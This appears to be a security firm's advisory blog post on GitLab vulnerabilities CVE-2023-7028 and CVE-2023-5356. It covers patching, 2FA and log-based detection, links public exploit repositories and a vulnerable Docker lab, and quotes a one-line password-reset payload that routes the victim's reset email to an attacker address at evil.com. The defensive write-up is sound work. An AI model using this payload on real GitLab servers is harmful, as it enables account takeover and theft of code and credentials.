TRACKFLAWHow to compromise Gitlab accounts with CVE-2023-7028 vulnerability
😮 Publicly exposing GitLab in 2024: too risky?
Is exposing one’s own GitLab a good security practice? Well, you will see that it is not.
2024 starts strongly, giving good reasons not to expose this service on the Internet (but rather to host it behind a VPN).
A tense start to the year
On January 11, 2024, GitLab, the renowned community platform, released an important announcement concerning new versions 16.7.2, 16.6.4, and 16.5.6 for GitLab Community Edition (CE) and Enterprise Edition (EE).
Two vulnerabilities are explained:
The CVE-2023-7028 vulnerability :
- CVSS score of 10/10 😮
- It allows account takeover via password reset without user interaction.
The CVE-2023-5356 vulnerability :
- CVSS score of 9.6/10 😟
- It allows a user to abuse Slack/Mattermost integrations to execute slash commands as another user.
In brief
The most problematic vulnerability is the first one: CVE-2023-7028.
Far from harmless, it is very problematic:
- It allows resetting the password of any user.
- The vulnerability is exploitable without an account.
- The victim’s email must be known.
- The payload consists of a single line:
user[email][]=my.target@example.com&user[email][]=hacker@evil.com
The second vulnerability is just as serious but less easily exploitable.
Exploitation
To exploit this vulnerability, the PoC is really very simple:
| |
valid@email.comis the victim’s addressattacker@email.comis the attacker’s address
GitLab creates confusion, allowing an attacker to overwrite the victim’s email with their own 😮!
More specifically, a change was made in version 16.1.0 to allow users to reset their passwords using a secondary email address. The vulnerability results from a bug in the email verification process.
👉 More details on GitLab’s blog: https://about.gitlab.com/releases/2024/01/11/critical-security-release-gitlab-16-7-2-released/#account-takeover-via-password-reset-without-user-interactions
Recommended actions
GitLab recommends the following actions:
1️⃣ Immediate Update: It is strongly advised to update GitLab to the latest patched version. For users who have not yet updated, GitLab recommends moving directly to versions 16.7.3, 16.6.5, 16.5.7 or later.
2️⃣ Enable Two-Factor Authentication (2FA): GitLab advises activating 2FA for all accounts. This security measure prevents the exploitation of this vulnerability.
3️⃣ Integrity Verification: Self-managed clients are advised to examine their logs to detect any exploitation attempts of these vulnerabilities.
Example:
- Check the
gitlab-rails/production_json.logfile to ensure that no request pointing to the /users/password route contains multiple email addresses. - Check the
gitlab-rails/audit_json.logfile to ensure that the meta.caller_id field of PasswordsController#create and target_details do not contain multiple email addresses.
Automation
Many PoCs are available online to automate the exploitation of this vulnerability:
- Made by a talented French developer: https://github.com/Vozec/CVE-2023-7028
- https://github.com/V1lu0/CVE-2023-7028
Vulnerable Docker
For the curious, below is a vulnerable docker compose to practice this vulnerability:
| |
Available on Trackflaw’s GitHub: https://github.com/Trackflaw/CVE-2023-7028-Docker
Demonstration
A small demonstration below to present the exploitation of the vulnerability:
🙏 Patch quickly. Trackflaw is here to help you with this task. Contact us at https://trackflaw.com or by email contact (@) trackflaw.com